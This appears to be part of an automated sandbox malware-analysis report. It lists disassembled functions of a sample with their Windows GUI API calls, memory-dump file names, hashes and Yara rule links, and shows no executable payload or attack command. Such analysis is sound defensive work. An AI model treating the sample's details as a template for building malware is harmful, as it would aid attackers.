                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3869813825-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorInfo.USER32 ref: 00458E03
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2577412497-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00469681 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 004696E0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$CtrlFocus
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1534620443-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004680EB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 204windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00468107
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3993528054-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046F2B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?), ref: 0046F34C
                                                                                                                                                                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                                                                                                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0046F3BC
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                                                                                                                                                                                                                                                                                                                                • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4085615965-3440237614
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044B988 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3832890014-4202584635
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00466999 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 004669C4
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00466A21
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 00466A90
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 00466B3F
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00466BC8
                                                                                                                                                                                                                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00466D1D
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00466BEE
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00466D4B
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: X$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3021350936-1944015008
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045F48E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226windowsleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0045F4AE
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InfoItemMenu$Sleep_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1504565804-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004556F8 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateDestroy
